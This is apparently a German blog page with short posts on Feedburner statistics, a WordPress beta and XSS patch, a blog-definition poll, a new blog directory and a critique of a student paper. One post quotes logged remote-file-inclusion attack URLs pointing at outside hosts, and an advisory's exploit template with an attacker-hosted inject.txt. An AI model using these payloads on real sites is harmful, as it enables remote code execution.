Software Guide

Wie Manuela berichtet, kann man mit Feedburner nun auch Webseitenstatistiken wie etwa Page Impressions, Besucherdetails, etc. aufzeichnen lassen. Sie erklärt, wie man dieses neue Feature aktiviert.

Hirnrinde berichtet, wie einfach man Feed-Abonnenten-Zahlen von fremden Blogs auslesen kann, auch wenn diese dies nicht wollen. So hat Stefan mal eben zum Testen die Feed-Statistik von Dr. Web und Bildblog ausgelesen. Tja, dies ist wohl die Krux, wenn man Dienste wie den Feed an kostenlose Dienste outsourct. Mich persönlich nervt es nicht, wenn andere diese Zahlen meiner Blogs auslesen können, aber ich kann mir durchaus vorstellen, dass es Projekte gibt, bei denen dies nicht gewünscht ist.

Vom Law-Blogger Udo Vetter gibt es einen sehr unterhaltsamen und interessanten Video-Vortrag auf Google Video: Sie haben das Recht zu schweigen. Das ganze war ein Vortrag im Rahmen des 23rd Chaos Communication Congress.
Weiterlesen…

WordPress 2.1 Beta1 Download:

Ja, es gibt nun die erste Beta-Version zu WordPress 2.1, Direktdownload (zip, 835k). Habe ich bei teezeh dot de gelesen, der gleich schon mal upgegraded hat, eine offizielle Ankündigung gab es aber wohl (noch) nicht.

WordPress Sicherheitslücke:

Frank Bültge weist auf eine WordPress-Sicherheitslücke hin, die alle aktuellen WordPress-Versionen einschließlich 2.0.5 betrifft, wobei Frank schreibt, dass der Fehler auch in der 2.0.6 beta 1 nicht behoben ist.

Bekannt ist diese Lücke wohl schon seit dem 27. Dezember, wie man bei dem Entdecker (?) Operation n nachlesen kann. techbuzz listet alle betroffenen stabilen WordPress-Versionen.

Einen Patch kann man im WordPress-Trac downloaden, oder man folgt den Anweisungen von Frank.

Es handelt sich hierbei übrigens um eine sog. XSS-Lücke, welche grundsätzlich sehr ernst zu nehmen sind.

Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.

Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:

sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??

Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/ noch gibt es dort diese comment.php. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?

Was bedeutet das jetzt?
Weiterlesen…

Techcrunch hat mit What Is The Definition Of A Blog? mal wieder die Frage aufgeworfen, ob ein Blog ohne Kommentarmöglichkeit wirklich ein Blog ist. Hierzulande wird in diesem Zusammenhang immer das Bildblog genannt, das ja sogar Blog als Namensbestandteil hat, aber keine Kommentare zulässt.

Interessant dabei ist, dass Techcrunch eine Umfrage dazu gemacht hat, und die Meinungen gehen sehr auseinander, hier der aktuelle Stand:

Übersetzung:

Ist ein Blog wirklich ein Blog, wenn Leser nicht kommentieren können?
a) Kommentare sind nicht notwendig, aber erweitern den Content erheblich
b) Kommentare sind nicht notwendig für Blogs
c) Ohne Kommentare ist es kein Blog

Ich habe für (c) gestimmt, da ich unter „Blog“ nicht nur ein stupides Artikel-Veröffentlichen verstehe ohne Kommunikation mit dem Leser. Ich finde Blogs schon oftmals tot und keine echten Blogs, wenn man sich zum kommentieren registrieren muss wie in einem Forum. Die Meinungen in der Techcrunch-Umfrage gehen jedenfalls weit auseinander. Aber letztendlich ist es ja nur eine Begrifflichkeit.

Frank Helmschrott hat mit Blogalm ein neues Blogverzeichnis eröffnet. Er schreibt dazu:

Die BlogAlm ist ein Blogverzeichnis im klassischen Stil. Ein Webverzeichnis speziell für deutschsprachige Blogs. Ich versuche mit der BlogAlm sowohl Besuchern als auch Blogbetreibern gerecht zu werden.

Für Besucher bietet sich ein übersichtliches Verzeichnis – wie üblich nach Kategorien sortiert. Einzelne Blogeinträge enthalten bereits in der Übersicht neben dem Titel eine Beschreibung und einen kleinen Screenshot. In der Detailansicht ist der Screenshot dann noch größer und deutlicher und die neuesten Headlines aus dem Feed des Blogs bieten einen ersten Einblick in die Inhalte.

Dem Blogbetreiber steht ein – selbstverständlich kostenloses – Verzeichnis zur Verfügung in das er seinen Blog binnen weniger Minuten eintragen kann. Nach erfolgter Freischaltung (Stichwort Qualitätskontrolle – Baustellen und Spamblogs haben keine Chance) wird sein Blog im Verzeichnis suchmaschinenwirksam gelistet (ausschließlich direkte Links, keine Maskierung).

Klingt wirklich interessant. Ich hab mich eben angemeldet und Software Guide dort erfasst. Der Anmeldevorgang war schnell erledigt und das Blog auch flink freigegeben. Wobei die Freigabe sicherlich zukünftig auch etwas dauern kann, weil er jede Anmeldung moderiert — was aber nur zum Vorteil von allen ist, um Spam erst gar nicht aufkommen zu lassen.

4 Studentinnen der Rheinischen Fachhochschule Köln haben eine Projektarbeit über Corporate Weblogs geschrieben, Download (PDF, 7MB) (Download wurde entfernt).

Ich habe die ersten Seiten der Arbeit mehr oder weniger überflogen. Sie macht oberflächlich einen guten Eindruck, liest man sich allerdings weiter ein, so werden manche Punkte meines Erachtens nicht richtig dargestellt.

Bei einer Passage hat es mich aber eben fast vom Stuhl gehauen und ich musste dreimal nachlesen, und zwar diese von Seite 38, wo zuvor noch Archiv-Blogs erklärt wurden:

Archivierung deutschsprachiger Blogs:
Der Law-Blog
Dieser Weblog, gegründet von Udo Vetter, stellt ein umfassendes Archiv deutschsprachiger Blogs zur Verfügung (siehe Abb. 22). Ein thematisch zutreffender Blog kann innerhalb des Law-Blogs bis zu 20.000 verschiedene Beiträge chronologisch archivieren. Der Law-Blog wird kostenlos zur Verfügung gestellt und ermöglicht den Bloggern ihre Beiträge an einem zentralen Punkt zu speichern. Neben einer Informationsvermittlung soll der Law-Blog auch eine Diskussionsplattform für angesprochene Themen sein. Die Betreiber des Law-Blogs weisen in ihren allgemeinen Geschäftsbedingungen darauf hin, dass detaillierte Rechtsfragen im Law-Blog nicht geklärt werden können, ergo Angaben innerhalb des Blogs die Konsultation eines Rechtsanwaltes nicht ersetzen.

Es wird dabei auf den Lawblog-Beitrag Textdiebe verwiesen. Sorry, aber aber das ist schlichtweg falsch. Lawblog hat in dem Artikel nur das Impressum eines (mittlerweile aufgelösten) Blogs zitiert und dazu Stellung bezogen. Dieses Archiv-Blog hatte unzählige Weblog-Inhalte unerlaubt bei sich gelistet, ich berichtete darüber am 08.05.2006 unter Dreister Content-Klau.

Als Einleitung werden auf Seite 38 Archiv-Blogs erklärt:

Archivblogs sind innerhalb von manchen Corporate Blogs verankert. Wie der Name schon sagt, archivieren diese Blogs die bereits bestehenden, um so eine ideale Informationsvermittlung zu ermöglichen. (…)

Nochmal: Diese sog. „Archiv-Blogs“ eignen sich unbefugt Content an (z.B. über RSS-Feeds) um dann z.B. über Anzeigenschaltung Geld zu verdienen, dies hat nichts mit Corporate Blogs zu tun.

Diese Falschaussagen zeigen, dass in keinster Weise gut recherchiert wurde. Ich habe mir diese Arbeit jetzt nicht mehr weiter angesehen, weiß also nicht ob noch weitere Hämmer enthalten sind.